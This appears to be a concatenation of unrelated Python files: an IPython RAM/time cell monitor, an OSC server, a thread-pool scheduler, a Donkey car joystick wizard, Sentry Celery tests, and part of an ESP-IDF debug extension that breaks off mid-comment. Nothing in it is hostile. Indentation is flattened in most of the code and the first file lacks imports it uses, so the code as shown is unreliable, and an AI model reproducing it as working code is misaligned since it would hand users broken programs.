from IPython import get_ipython
__version__ = "0.2.5"
class MemWatcher(object):
def __init__(self):
# keep a global accounting for the last known memory usage
# which is the reference point for the memory delta calculation
self.previous_call_memory_usage = memory_profiler.memory_usage()[0]
self.t1 = time.time()  # reset by pre_run_cell just before each command runs
self.keep_watching = True
self.peak_memory_usage = -1
self.peaked_memory_usage = -1
self.memory_delta = 0
self.time_delta = 0
self.watching_memory = True
self.ip = get_ipython()
self.input_cells = self.ip.user_ns['In']
self._measurements = namedtuple(
'Measurements',
['memory_delta', 'time_delta', 'memory_peak', 'memory_usage'],
)
@property
def measurements(self):
return self._measurements(
self.memory_delta, self.time_delta,
self.peaked_memory_usage, self.previous_call_memory_usage)
def start_watching_memory(self):
"""Register memory profiling tools to IPython instance."""
# Just in case start is called more than once, stop watching. Hence unregister events.
self.stop_watching_memory()
self.watching_memory = True
self.ip.events.register("post_run_cell", self.watch_memory)
self.ip.events.register("pre_run_cell", self.pre_run_cell)
def stop_watching_memory(self):
"""Unregister memory profiling tools from IPython instance."""
self.watching_memory = False
try:
self.ip.events.unregister("post_run_cell", self.watch_memory)
except ValueError:
pass
try:
self.ip.events.unregister("pre_run_cell", self.pre_run_cell)
except ValueError:
pass
def watch_memory(self):
if not self.watching_memory:
return
# calculate time delta using t1 (recorded by the pre_run_cell
# event) and the current time
self.time_delta = time.time() - self.t1
new_memory_usage = memory_profiler.memory_usage()[0]
self.memory_delta = new_memory_usage - self.previous_call_memory_usage
self.keep_watching = False
self.peaked_memory_usage = max(0, self.peak_memory_usage - new_memory_usage)
num_commands = len(self.input_cells) - 1
cmd = "In [{}]".format(num_commands)
# convert the results into a pretty string
output_template = ("{cmd} used {memory_delta:0.3f} MiB RAM in "
"{time_delta:0.3f}s, peaked {peaked_memory_usage:0.3f} "
"MiB above current, total RAM usage "
"{memory_usage:0.3f} MiB")
output = output_template.format(
time_delta=self.time_delta,
cmd=cmd,
memory_delta=self.memory_delta,
peaked_memory_usage=self.peaked_memory_usage,
memory_usage=new_memory_usage)
print(str(output))
self.previous_call_memory_usage = new_memory_usage
def during_execution_memory_sampler(self):
import time
import memory_profiler
self.peak_memory_usage = -1
self.keep_watching = True
n = 0
WAIT_BETWEEN_SAMPLES_SECS = 0.001
MAX_ITERATIONS = 60.0 / WAIT_BETWEEN_SAMPLES_SECS
while True:
mem_usage = memory_profiler.memory_usage()[0]
self.peak_memory_usage = max(mem_usage, self.peak_memory_usage)
time.sleep(WAIT_BETWEEN_SAMPLES_SECS)
if not self.keep_watching or n > MAX_ITERATIONS:
# exit if we've been told our command has finished or
# if it has run for more than a sane amount of time
# (e.g. maybe something crashed and we don't want this
# to carry on running)
if n > MAX_ITERATIONS:
print("{} SOMETHING WEIRD HAPPENED AND THIS RAN FOR TOO LONG, THIS THREAD IS KILLING ITSELF".format(__file__))
break
n += 1
def pre_run_cell(self):
"""Capture current time before we execute the current command"""
# start a thread that samples RAM usage until the current
# command finishes
ipython_memory_usage_thread = threading.Thread(
target=self.during_execution_memory_sampler)
ipython_memory_usage_thread.daemon = True
ipython_memory_usage_thread.start()
self.t1 = time.time()
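# Minimal usage sketch (assumes this module is loaded inside an interactive
# IPython session, e.g. via %run; outside IPython get_ipython() returns None
# and MemWatcher cannot hook the cell events).
if __name__ == '__main__' and get_ipython() is not None:
    watcher = MemWatcher()
    watcher.start_watching_memory()    # print a RAM/time report after every cell
    # ... execute some cells interactively ...
    # watcher.stop_watching_memory()   # unregister the IPython event hooks
    # watcher.measurements             # namedtuple with the last recorded values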
|
server.py
|
import threading
from pyee import EventEmitter
from pythonosc import dispatcher, osc_server
from tomomibot.const import OSC_ADDRESS, OSC_PORT
class Server:
def __init__(self, ctx, **kwargs):
self.ctx = ctx
self.is_running = False
# Provide an interface for event subscribers
self.emitter = EventEmitter()
# Prepare OSC message dispatcher and UDP server
self.address = kwargs.get('osc_address', OSC_ADDRESS)
self.port = kwargs.get('osc_port', OSC_PORT)
bind = (self.address, self.port)
disp = dispatcher.Dispatcher()
disp.map('/tomomibot/*', self._on_param)
self._server = osc_server.ThreadingOSCUDPServer(bind, disp)
def start(self):
thread = threading.Thread(target=self._start_server)
thread.daemon = True
thread.start()
self.is_running = True
def stop(self):
self._server.shutdown()
self.is_running = False
def _start_server(self):
self.ctx.log('OSC server @ {}:{}'.format(self.address,
self.port))
self._server.serve_forever()
def _on_param(self, address, *args):
param = address.replace('/tomomibot/', '')
# Commands with no arguments
if param == 'reset':
self.emitter.emit('reset')
return
# We expect one float argument from now on
if not len(args) == 1 or type(args[0]) is not float:
return
if param in ['temperature'] and 0 <= args[0] <= 1:
self.emitter.emit('param', param, args[0])
if param in ['interval'] and 0 <= args[0] <= 5:
self.emitter.emit('param', param, args[0])
if param in ['volume']:
self.emitter.emit('param', param, args[0])
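# Minimal usage sketch (assumes the default OSC address/port from tomomibot.const
# are free; the context object only needs a `log` method for this demo).
if __name__ == '__main__':
    class _DemoCtx:
        def log(self, msg):
            print(msg)

    server = Server(_DemoCtx())
    # react to incoming /tomomibot/<param> messages
    server.emitter.on('param', lambda name, value: print('param', name, value))
    server.emitter.on('reset', lambda: print('reset requested'))
    server.start()
    # ... send OSC messages from a client, then shut the server down:
    server.stop()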
|
scheduler.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2018/3/31 21:53
# @Author : Yunhao Cao
# @File : scheduler.py
import time
import threading
import queue as Queue
__author__ = 'Yunhao Cao'
__all__ = [
'Scheduler',
]
def work_func(func, args, kwargs, queue, token):
args = args or []
kwargs = kwargs or {}
func(*args, **kwargs)
queue.put(token)
def wait_func(wait_queue, work_queue):
while True:
task = wait_queue.get()
func, args, kwargs = task
token = work_queue.get()
args = [func, args, kwargs, work_queue, token]
t = threading.Thread(target=work_func, args=args)
t.daemon = True
t.start()
class ThreadPool(object):
def __init__(self, size):
self.size = size
self.wait_queue = None
self.work_queue = None
self.wait_thread = None
self.init()
def init(self):
self.wait_queue = Queue.Queue()
self.work_queue = Queue.Queue(maxsize=self.size)
for i in range(self.size):
self.work_queue.put(i)
wait_thread = threading.Thread(target=wait_func, args=[self.wait_queue, self.work_queue])
wait_thread.daemon = True
wait_thread.start()
def put(self, func, args=None, kwargs=None):
self.wait_queue.put((func, args, kwargs))
class Scheduler(object):
def __init__(self, size=4):
self.pool = ThreadPool(size)
def put(self, func, args=None, kwargs=None):
self.pool.put(func, args, kwargs)
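# Minimal usage sketch for the exported Scheduler class (illustrative call pattern):
#   scheduler = Scheduler(size=2)
#   scheduler.put(hello, args=['alice', 'bob'])   # runs on one of 2 worker threads
#   scheduler.put(hello, args=['carol', 'dave'])  # queued until a slot frees up
# Worker threads are daemonic, so keep the main thread alive long enough for
# queued tasks to finish (see _test below).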
def hello(*args):
print(args)
print('{} says \'hello\' to {}.'.format(args[0], args[1]))
time.sleep(5)
print('{} end.'.format(args))
return args
def _test():
tp = ThreadPool(2)
tp.put(hello, ['a', 'b'])
tp.put(hello, ['c', 'd'])
tp.put(hello, ['e', 'f'])
tp.put(hello, ['1', '2'])
tp.put(hello, ['3', '4'])
# worker threads are daemonic, so keep the main thread alive long enough
# for the queued tasks (5 tasks of ~5 s each on 2 workers) to finish
time.sleep(16)
print('main exit.')
if __name__ == '__main__':
_test()
|
joystick_creator.py
|
import sys
import os
import argparse
import json
import time
import math
from donkeycar.utils import *
from donkeycar.parts.controller import JoystickCreatorController
try:
from prettytable import PrettyTable
except ImportError:
print("need: pip install PrettyTable")
class CreateJoystick(object):
def __init__(self):
self.last_button = None
self.last_axis = None
self.axis_val = 0
self.running = False
self.thread = None
self.gyro_axis = []
self.axis_map = []
self.ignore_axis = False
self.mapped_controls = []
def poll(self):
while self.running:
button, button_state, axis, axis_val = self.js.poll()
if button is not None:
self.last_button = button
self.last_axis = None
self.axis_val = 0.0
elif axis is not None and not self.ignore_axis:
if not axis in self.gyro_axis:
self.last_axis = axis
self.last_button = None
self.axis_val = axis_val
def get_button_press(self, duration=10.0):
self.last_button = None
start = time.time()
while self.last_button is None and time.time() - start < duration:
time.sleep(0.1)
return self.last_button
def get_axis_move(self, duration=2.0):
self.last_axis = None
axis_samples = {}
start = time.time()
while time.time() - start < duration:
if self.last_axis:
if self.last_axis in axis_samples:
try:
axis_samples[self.last_axis] = axis_samples[self.last_axis] + math.fabs(self.axis_val)
except:
try:
axis_samples[self.last_axis] = math.fabs(self.axis_val)
except:
pass
else:
axis_samples[self.last_axis] = math.fabs(self.axis_val)
most_movement = None
most_val = 0
for key, value in axis_samples.items():
if value > most_val:
most_movement = key
most_val = value
return most_movement
def clear_scr(self):
print(chr(27) + "[2J")
def create_joystick(self, args):
self.clear_scr()
print("##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~##")
print("## Welcome to Joystick Creator Wizard. ##")
print("##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~##")
print("This will generate code to use your joystick with a Donkey car.")
print()
print("Overview:")
print()
print("First we name each button, then each axis control.")
print("Next we map names to actions.")
print("Finally we output a python file you can use in your project.")
print()
input('Hit Enter to continue')
self.clear_scr()
print("Please plug-in your controller via USB or bluetooth. Make sure status lights are on and device is mapped.")
input('Enter to continue ')
self.clear_scr()
self.init_js_device()
print()
self.init_polling_js()
self.clear_scr()
self.find_gyro()
self.clear_scr()
self.explain_config()
self.clear_scr()
self.name_buttons()
self.clear_scr()
self.name_axes()
self.clear_scr()
self.map_steering_throttle()
self.clear_scr()
self.map_button_controls()
self.clear_scr()
self.revisit_topic()
self.clear_scr()
self.write_python_class_file()
print("Check your new python file to see the controller implementation. Import this in manage.py and use for control.")
self.shutdown()
def init_js_device(self):
from donkeycar.parts.controller import JoystickCreatorController
js_cr = None
#Get device file and create js creator helper class
while js_cr is None:
print("Where can we find the device file for your joystick?")
dev_fn = input("Hit Enter for default: /dev/input/js0 or type alternate path: ")
if len(dev_fn) == 0:
dev_fn = '/dev/input/js0'
print()
print("Attempting to open device at that file...")
try:
js_cr = JoystickCreatorController(dev_fn=dev_fn)
res = js_cr.init_js()
if res:
print("Found and accessed input device.")
else:
js_cr = None
except Exception as e:
print("threw exception:" + str(e))
js_cr = None
if js_cr is None:
ret = input("Failed to open device. try again? [Y/n] : ")
if ret.upper() == "N":
exit(0)
self.js = js_cr.js
input("Hit Enter to continue")
def init_polling_js(self):
self.running = True
import threading
self.thread = threading.Thread(target=self.poll)
self.thread.daemon = True
self.thread.start()
def find_gyro(self):
print("Next we are going to look for gyroscope data.")
input("For 5 seconds, move controller and rotate on each axis. Hit Enter then start moving: ")
start = time.time()
while time.time() - start < 5.0:
if self.last_axis is not None and not self.last_axis in self.gyro_axis:
self.gyro_axis.append(self.last_axis)
print()
if len(self.gyro_axis) > 0:
print("Ok, we found %d axes that stream gyroscope data. We will ignore those during labelling and mapping." % len(self.gyro_axis))
else:
print("Ok, we didn't see any events. So perhaps your controller doesn't emit gyroscope data. No problem.")
input("Hit Enter to continue ")
def get_code_from_button(self, button):
code = button
if 'unknown' in button:
try:
code_str = button.split('(')[1][:-1]
code = int(code_str, 16)
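# e.g. a button reported as "unknown(0x120)" (the form used for unmapped
# inputs) yields code_str "0x120" and code 288; format assumed from the split above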
except Exception as e:
code = None
print("failed to parse code", str(e))
return code
def explain_config(self):
print("We will display the current progress in this set of tables:")
print()
self.print_config()
print("\nAs you name buttons and map them to controls this table will be updated.")
input("Hit enter to continue")
def name_buttons(self):
done = False
self.ignore_axis = True
self.print_config()
print('Next we will give every button a name. Not analog yet. We will do that next.')
while not done:
print('Tap a button to name it.')
self.get_button_press()
if self.last_button is None:
print("No button was pressed in last 10 seconds. It's possible that your buttons all generate axis commands.")
ret = input("Keep mapping buttons? [Y, n]")
if ret == 'n':
break
elif 'unknown' in self.last_button:
code = self.get_code_from_button(self.last_button)
if code is not None:
if code in self.js.button_names:
ret = input("This button has a name: %s. Are you done naming? (y/N) " % self.js.button_names[code])
if ret.upper() == "Y":
done = True
break
label = input("What name to give to this button:")
if len(label) == 0:
print("No name given. skipping.")
else:
self.clear_scr()
self.js.button_names[code] = label
self.print_config()
else:
print('got press: ', self.last_button)
self.clear_scr()
self.print_config()
def print_config(self):
pt = PrettyTable()
pt.field_names = ["button code", "button name"]
for key, value in self.js.button_names.items():
pt.add_row([str(hex(key)), str(value)])
print("Button Map:")
print(pt)
pt = PrettyTable()
pt.field_names = ["axis code", "axis name"]
for key, value in self.js.axis_names.items():
pt.add_row([str(hex(key)), str(value)])
print("Axis Map:")
print(pt)
pt = PrettyTable()
pt.field_names = ["control", "action"]
for button, control in self.mapped_controls:
pt.add_row([button, control])
for axis, control in self.axis_map:
pt.add_row([axis, control])
print("Control Map:")
print(pt)
def name_axes(self):
self.print_config()
print()
print('Next we are going to name all the axes you would like to use.')
done = False
self.ignore_axis = False
while not done:
print('Prepare to move one axis on the controller for 2 sec.')
ret = input("Hit Enter to begin. D when done. ")
if ret.upper() == 'D':
break
most_movement = self.get_axis_move()
if most_movement is None:
print("Didn't detect any movement.")
res = input("Try again? [Y/n]: ")
if res == "n":
done = True
break
else:
continue
if 'unknown' in most_movement:
code_str = most_movement.split('(')[1][:-1]
print('Most movement on axis code:', code_str)
try:
code = int(code_str, 16)
except Exception as e:
code = None
print("Failed to parse code", str(e))
if code is not None:
label = input("What name to give to this axis: (D when done) ")
if len(label) == 0:
print("No name given. skipping.")
elif label.upper() == 'D':
done = True
else:
self.js.axis_names[code] = label
self.clear_scr()
self.print_config()
else:
print('Got axis: ', self.last_axis)
print()
def write_python_class_file(self):
pyth_filename = None
outfile = None
while pyth_filename is None:
print("Now we will write these values to a new python file.")
pyth_filename = input("What is the name of python file to create joystick code? [default: my_joystick.py]")
if len(pyth_filename) == 0:
pyth_filename = 'my_joystick.py'
print('using filename:', pyth_filename)
print()
try:
outfile = open(pyth_filename, "wt")
except:
ret = input("failed to open filename. Enter another filename? [Y,n]")
if ret == "n":
break
pyth_filename = None
print()
if outfile is not None:
classname = input("What is the name of joystick class? [default: MyJoystick] ")
if len(classname) == 0:
classname = "MyJoystick"
file_header = \
'''
from donkeycar.parts.controller import Joystick, JoystickController
class %s(Joystick):
#An interface to a physical joystick available at /dev/input/js0
def __init__(self, *args, **kwargs):
super(%s, self).__init__(*args, **kwargs)
\n''' % (classname, classname )
outfile.write(file_header)
outfile.write(' self.button_names = {\n')
for key, value in self.js.button_names.items():
outfile.write(" %s : '%s',\n" % (str(hex(key)), str(value)))
outfile.write(' }\n\n\n')
outfile.write(' self.axis_names = {\n')
for key, value in self.js.axis_names.items():
outfile.write(" %s : '%s',\n" % (str(hex(key)), str(value)))
outfile.write(' }\n\n\n')
js_controller = \
'''
class %sController(JoystickController):
#A Controller object that maps inputs to actions
def __init__(self, *args, **kwargs):
super(%sController, self).__init__(*args, **kwargs)
def init_js(self):
#attempt to init joystick
try:
self.js = %s(self.dev_fn)
self.js.init()
except FileNotFoundError:
print(self.dev_fn, "not found.")
self.js = None
return self.js is not None
def init_trigger_maps(self):
#init set of mapping from buttons to function calls
\n''' % (classname, classname, classname)
outfile.write(js_controller)
outfile.write(' self.button_down_trigger_map = {\n')
for button, control in self.mapped_controls:
outfile.write(" '%s' : self.%s,\n" % (str(button), str(control)))
outfile.write(' }\n\n\n')
outfile.write(' self.axis_trigger_map = {\n')
for axis, control in self.axis_map:
outfile.write(" '%s' : self.%s,\n" % (str(axis), str(control)))
outfile.write(' }\n\n\n')
outfile.close()
print(pyth_filename, "written.")
def map_control_axis(self, control_name, control_fn):
while True:
axis = self.get_axis_action('Move the controller axis you wish to use for %s. Continue moving for 2 seconds.' % control_name)
mapped = False
if axis is None:
print("No mapping for %s." % control_name)
else:
#print("axis", axis)
code = self.get_code_from_button(axis)
for key, value in self.js.axis_names.items():
#print('key', key, 'value', value)
if key == code or value == code:
print('Mapping %s to %s.\n' % (value, control_name))
mapped = value
break
if mapped:
ret = input('Is this mapping ok? (y, N) ')
if ret.upper() == 'Y':
self.axis_map.append((mapped, control_fn))
return
else:
ret = input('axis not recognized. try again? (Y, n) ')
if ret.upper() == 'N':
return
def map_steering_throttle(self):
self.axis_map = []
self.print_config()
print()
print('Now we will create a mapping of controls to actions.\n')
print("First steering.")
self.map_control_axis("steering", "set_steering")
self.clear_scr()
self.print_config()
print()
print("Next throttle.")
self.map_control_axis("throttle", "set_throttle")
def map_button_controls(self):
unmapped_controls = [\
('toggle_mode','changes the drive mode between user, local, and local_angle'),
('erase_last_N_records','erases the last 100 records while driving'),
('emergency_stop','executes a full back throttle to bring car to a quick stop'),
('increase_max_throttle','increases the max throttle, also used for constant throttle val'),
('decrease_max_throttle','decreases the max throttle, also used for constant throttle val'),
('toggle_constant_throttle', 'toggle the mode of supplying constant throttle'),
('toggle_manual_recording','toggles recording records on and off')
]
self.mapped_controls = []
self.print_config()
print()
print("Next we are going to assign button presses to controls.")
print()
while len(unmapped_controls) > 0:
pt = PrettyTable()
pt.field_names = ['Num', 'Control', 'Help']
print("Unmapped Controls:")
for i, td in enumerate(unmapped_controls):
control, help = td
pt.add_row([i + 1, control, help])
print(pt)
print()
try:
ret = " "
while (not ret.isdigit() and ret.upper() != 'D') or (ret.isdigit() and (int(ret) < 1 or int(ret) > len(unmapped_controls))):
ret = input("Press the number of control to map (1-%d). D when done. " % len(unmapped_controls))
if ret.upper() == 'D':
break
iControl = int(ret) - 1
except:
continue
print('Press the button to map to control:', unmapped_controls[iControl][0])
self.get_button_press()
if self.last_button is None:
print("No button was pressed in last 10 seconds.")
ret = input("Keep mapping commands? [Y, n]")
if ret == 'n':
break
else:
code = self.get_code_from_button(self.last_button)
if code in self.js.button_names:
button_name = self.js.button_names[code]
else:
button_name = self.last_button
self.mapped_controls.append((button_name, unmapped_controls[iControl][0]))
unmapped_controls.pop(iControl)
self.clear_scr()
self.print_config()
print()
print('done mapping controls')
print()
def revisit_topic(self):
done = False
while not done:
self.clear_scr()
self.print_config()
print("Now we are nearly done! Are you happy with this config or would you like to revisit a topic?")
print("H)appy, please continue to write out python file.")
print("B)uttons need renaming.")
print("A)xes need renaming.")
print("T)hrottle and steering need remap.")
print("R)emap buttons to controls.")
ret = input("Select option ").upper()
if ret == 'H':
done = True
elif ret == 'B':
self.name_buttons()
elif ret == 'A':
self.name_axes()
elif ret == 'T':
self.map_steering_throttle()
elif ret == 'R':
self.map_button_controls()
def get_axis_action(self, prompt):
done = False
while not done:
print(prompt)
ret = input("Hit Enter to begin. D when done. ")
if ret.upper() == 'D':
return None
most_movement = self.get_axis_move()
if most_movement is None:
print("Didn't detect any movement.")
res = input("Try again? [Y/n]: ")
if res == "n":
return None
else:
continue
else:
return most_movement
def shutdown(self):
self.running = False
if self.thread:
self.thread = None
def parse_args(self, args):
parser = argparse.ArgumentParser(prog='createjs', usage='%(prog)s [options]')
parsed_args = parser.parse_args(args)
return parsed_args
def run(self, args):
args = self.parse_args(args)
try:
self.create_joystick(args)
except KeyboardInterrupt:
self.shutdown()
|
test_celery.py
|
import threading
import pytest
pytest.importorskip("celery")
from sentry_sdk import Hub, configure_scope
from sentry_sdk.integrations.celery import CeleryIntegration
from sentry_sdk.tracing import SpanContext
from celery import Celery, VERSION
from celery.bin import worker
@pytest.fixture
def connect_signal(request):
def inner(signal, f):
signal.connect(f)
request.addfinalizer(lambda: signal.disconnect(f))
return inner
@pytest.fixture
def init_celery(sentry_init):
def inner(propagate_traces=True):
sentry_init(integrations=[CeleryIntegration(propagate_traces=propagate_traces)])
celery = Celery(__name__)
if VERSION < (4,):
celery.conf.CELERY_ALWAYS_EAGER = True
else:
celery.conf.task_always_eager = True
return celery
return inner
@pytest.fixture
def celery(init_celery):
return init_celery()
@pytest.mark.parametrize(
"invocation,expected_context",
[
[lambda task, x, y: task.delay(x, y), {"args": [1, 0], "kwargs": {}}],
[lambda task, x, y: task.apply_async((x, y)), {"args": [1, 0], "kwargs": {}}],
[
lambda task, x, y: task.apply_async(args=(x, y)),
{"args": [1, 0], "kwargs": {}},
],
[
lambda task, x, y: task.apply_async(kwargs=dict(x=x, y=y)),
{"args": [], "kwargs": {"x": 1, "y": 0}},
],
],
)
def test_simple(capture_events, celery, invocation, expected_context):
events = capture_events()
@celery.task(name="dummy_task")
def dummy_task(x, y):
foo = 42 # noqa
return x / y
span_context = SpanContext.start_trace()
with configure_scope() as scope:
scope.set_span_context(span_context)
invocation(dummy_task, 1, 2)
invocation(dummy_task, 1, 0)
event, = events
assert event["contexts"]["trace"]["trace_id"] == span_context.trace_id
assert event["contexts"]["trace"]["span_id"] != span_context.span_id
assert event["transaction"] == "dummy_task"
assert event["extra"]["celery-job"] == dict(
task_name="dummy_task", **expected_context
)
exception, = event["exception"]["values"]
assert exception["type"] == "ZeroDivisionError"
assert exception["mechanism"]["type"] == "celery"
assert exception["stacktrace"]["frames"][0]["vars"]["foo"] == "42"
def test_simple_no_propagation(capture_events, init_celery):
celery = init_celery(propagate_traces=False)
events = capture_events()
@celery.task(name="dummy_task")
def dummy_task():
1 / 0
span_context = SpanContext.start_trace()
with configure_scope() as scope:
scope.set_span_context(span_context)
dummy_task.delay()
event, = events
assert event["contexts"]["trace"]["trace_id"] != span_context.trace_id
assert event["transaction"] == "dummy_task"
exception, = event["exception"]["values"]
assert exception["type"] == "ZeroDivisionError"
def test_ignore_expected(capture_events, celery):
events = capture_events()
@celery.task(name="dummy_task", throws=(ZeroDivisionError,))
def dummy_task(x, y):
return x / y
dummy_task.delay(1, 2)
dummy_task.delay(1, 0)
assert not events
def test_broken_prerun(init_celery, connect_signal):
from celery.signals import task_prerun
stack_lengths = []
def crash(*args, **kwargs):
# scope should exist in prerun
stack_lengths.append(len(Hub.current._stack))
1 / 0
# Order here is important to reproduce the bug: In Celery 3, a crashing
# prerun would prevent other preruns from running.
connect_signal(task_prerun, crash)
celery = init_celery()
assert len(Hub.current._stack) == 1
@celery.task(name="dummy_task")
def dummy_task(x, y):
stack_lengths.append(len(Hub.current._stack))
return x / y
if VERSION >= (4,):
dummy_task.delay(2, 2)
else:
with pytest.raises(ZeroDivisionError):
dummy_task.delay(2, 2)
assert len(Hub.current._stack) == 1
if VERSION < (4,):
assert stack_lengths == [2]
else:
assert stack_lengths == [2, 2]
@pytest.mark.xfail(
(4, 2, 0) <= VERSION,
strict=True,
reason="https://github.com/celery/celery/issues/4661",
)
def test_retry(celery, capture_events):
events = capture_events()
failures = [True, True, False]
runs = []
@celery.task(name="dummy_task", bind=True)
def dummy_task(self):
runs.append(1)
try:
if failures.pop(0):
1 / 0
except Exception as exc:
self.retry(max_retries=2, exc=exc)
dummy_task.delay()
assert len(runs) == 3
assert not events
failures = [True, True, True]
runs = []
dummy_task.delay()
assert len(runs) == 3
event, = events
exceptions = event["exception"]["values"]
for e in exceptions:
assert e["type"] == "ZeroDivisionError"
@pytest.mark.skipif(VERSION < (4,), reason="in-memory backend broken")
def test_transport_shutdown(request, celery, capture_events_forksafe, tmpdir):
events = capture_events_forksafe()
celery.conf.worker_max_tasks_per_child = 1
celery.conf.broker_url = "memory://localhost/"
celery.conf.broker_backend = "memory"
celery.conf.result_backend = "file://{}".format(tmpdir.mkdir("celery-results"))
celery.conf.task_always_eager = False
runs = []
@celery.task(name="dummy_task", bind=True)
def dummy_task(self):
runs.append(1)
1 / 0
res = dummy_task.delay()
w = worker.worker(app=celery)
t = threading.Thread(target=w.run)
t.daemon = True
t.start()
with pytest.raises(Exception):
# Celery 4.1 raises a gibberish exception
res.wait()
event = events.read_event()
exception, = event["exception"]["values"]
assert exception["type"] == "ZeroDivisionError"
events.read_flush()
# if this is nonempty, the worker never really forked
assert not runs
|
debug_ext.py
|
import json
import os
import re
import shlex
import subprocess
import sys
import threading
import time
from threading import Thread
from idf_py_actions.errors import FatalError
from idf_py_actions.tools import ensure_build_directory
PYTHON = sys.executable
def action_extensions(base_actions, project_path):
OPENOCD_OUT_FILE = 'openocd_out.txt'
GDBGUI_OUT_FILE = 'gdbgui_out.txt'
# Internal dictionary of currently active processes, threads and their output files
processes = {'threads_to_join': [], 'openocd_issues': None}
def _check_for_common_openocd_issues(file_name, print_all=True):
if processes['openocd_issues'] is not None:
return processes['openocd_issues']
try:
message = 'Please check JTAG connection!'
with open(file_name, 'r') as f:
content = f.read()
if print_all:
print(content)
if re.search(r'Address already in use', content):
message = ('Please check if another process uses the mentioned ports. OpenOCD already running, perhaps in the background?\n'
'Please list all processes to check if OpenOCD is already running; if so, terminate it before starting OpenOCD from idf.py')
finally:
processes['openocd_issues'] = message
return message
def _check_openocd_errors(fail_if_openocd_failed, target, ctx):
if fail_if_openocd_failed:
if 'openocd' in processes and processes['openocd'] is not None:
p = processes['openocd']
name = processes['openocd_outfile_name']
# watch OpenOCD (for 5x500ms) to check if it hasn't terminated or outputs an error
for _ in range(5):
if p.poll() is not None:
print('OpenOCD exited with {}'.format(p.poll()))
break
with open(name, 'r') as f:
content = f.read()
if re.search(r'no device found', content):
break
if re.search(r'Listening on port \d+ for gdb connections', content):
# expect OpenOCD has started successfully - stop watching
return
time.sleep(0.5)
else:
return
# OpenOCD exited or error message detected -> print possible output and terminate
raise FatalError('Action "{}" failed due to errors in OpenOCD:\n{}'.format(target, _check_for_common_openocd_issues(name)), ctx)
def _terminate_async_target(target):
if target in processes and processes[target] is not None:
try:
if target + '_outfile' in processes:
processes[target + '_outfile'].close()
p = processes[target]
if p.poll() is None:
p.terminate()
# waiting 10x100ms for the process to terminate gracefully
for _ in range(10):
if p.poll() is not None:
break
time.sleep(0.1)
else:
p.kill()
if target + '_outfile_name' in processes:
if target == 'openocd':
print(_check_for_common_openocd_issues(processes[target + '_outfile_name'], print_all=False))
os.unlink(processes[target + '_outfile_name'])
except Exception as e:
print(e)
print('Failed to close/kill {}'.format(target))
processes[target] = None # to indicate this has ended
def _get_commandline_options(ctx):
""" Return all the command line options up to first action """
# This approach ignores argument parsing done by Click
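# e.g. an invocation like "idf.py -C my_project build flash" (illustrative)
# yields ['idf.py', '-C', 'my_project']; collection stops at the first
# recognized action name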
result = []
for arg in sys.argv:
if arg in ctx.command.commands_with_aliases:
break
result.append(arg)
return result
def create_local_gdbinit(gdbinit, elf_file):
with open(gdbinit, 'w') as f:
if os.name == 'nt':
elf_file = elf_file.replace('\\','\\\\')
f.write('file {}\n'.format(elf_file))
f.write('target remote :3333\n')
f.write('mon reset halt\n')
f.write('flushregs\n')
f.write('thb app_main\n')
f.write('c\n')
def debug_cleanup():
print('cleaning up debug targets')
for t in processes['threads_to_join']:
if threading.currentThread() != t:
t.join()
_terminate_async_target('openocd')
_terminate_async_target('gdbgui')
_terminate_async_target('gdb')
def post_debug(action, ctx, args, **kwargs):
""" Deal with asynchronous targets, such as openocd running in background """
if kwargs['block'] == 1:
for target in ['openocd', 'gdbgui']:
if target in processes and processes[target] is not None:
break
else:
return
try:
p = processes[target]
name = processes[target + '_outfile_name']
pos = 0
while True:
with open(name, 'r') as f:
f.seek(pos)
for line in f:
print(line.rstrip())
pos = f.tell()
if p.poll() is not None:
print('"{}" exited with {}'.format(target, p.poll()))
break
time.sleep(0.5)
except KeyboardInterrupt:
print('Terminated -> exiting debug utility targets')
_terminate_async_target('openocd')
_terminate_async_target('gdbgui')
def get_project_desc(args, ctx):
desc_path = os.path.join(args.build_dir, 'project_description.json')
if not os.path.exists(desc_path):
ensure_build_directory(args, ctx.info_name)
with open(desc_path, 'r') as f:
project_desc = json.load(f)
return project_desc
def openocd(action, ctx, args, openocd_scripts, openocd_commands):
"""
Execute openocd as external tool
"""
OPENOCD_TARGET_CONFIG = {
'esp32': '-f board/esp32-wrover-kit-3.3v.cfg',
'esp32s2': '-f board/esp32s2-kaluga-1.cfg',
}
if os.getenv('OPENOCD_SCRIPTS') is None:
raise FatalError('OPENOCD_SCRIPTS not found in the environment: Please run export.sh/export.bat', ctx)
openocd_arguments = os.getenv('OPENOCD_COMMANDS') if openocd_commands is None else openocd_commands
project_desc = get_project_desc(args, ctx)
if openocd_arguments is None:
# use default value if commands not defined in the environment nor command line
target = project_desc['target']
default_args = '-f interface/ftdi/esp32_devkitj_v1.cfg -f target/{}.cfg'.format(target)
openocd_arguments = OPENOCD_TARGET_CONFIG.get(target, default_args)
print('Note: OpenOCD cfg not found (neither via the OPENOCD_COMMANDS environment variable nor the --openocd-commands argument)\n'
'OpenOCD arguments default to: "{}"'.format(openocd_arguments))
# script directory is taken from the environment by OpenOCD; update it only if command line arguments override it
if openocd_scripts is not None:
openocd_arguments += ' -s {}'.format(openocd_scripts)
local_dir = project_desc['build_dir']
args = ['openocd'] + shlex.split(openocd_arguments)
openocd_out_name = os.path.join(local_dir, OPENOCD_OUT_FILE)
openocd_out = open(openocd_out_name, 'a+')
try:
process = subprocess.Popen(args, stdout=openocd_out, stderr=subprocess.STDOUT, bufsize=1)
except Exception as e:
print(e)
raise FatalError('Error starting openocd. Please make sure it is installed and is present in executable paths', ctx)
processes['openocd'] = process
processes['openocd_outfile'] = openocd_out
processes['openocd_outfile_name'] = openocd_out_name
print('OpenOCD started as a background task {}'.format(process.pid))
def gdbui(action, ctx, args, gdbgui_port, gdbinit, require_openocd):
"""
Asynchronous GDB-UI target
"""
project_desc = get_project_desc(args, ctx)
local_dir = project_desc['build_dir']
gdb = project_desc['monitor_toolprefix'] + 'gdb'
if gdbinit is None:
gdbinit = os.path.join(local_dir, 'gdbinit')
create_local_gdbinit(gdbinit, os.path.join(args.build_dir, project_desc['app_elf']))
args = ['gdbgui', '-g', gdb, '--gdb-args="-x={}"'.format(gdbinit)]
if gdbgui_port is not None:
args += ['--port', gdbgui_port]
gdbgui_out_name = os.path.join(local_dir, GDBGUI_OUT_FILE)
gdbgui_out = open(gdbgui_out_name, 'a+')
env = os.environ.copy()
# The only known solution for https://github.com/cs01/gdbgui/issues/359 is to set the following environment
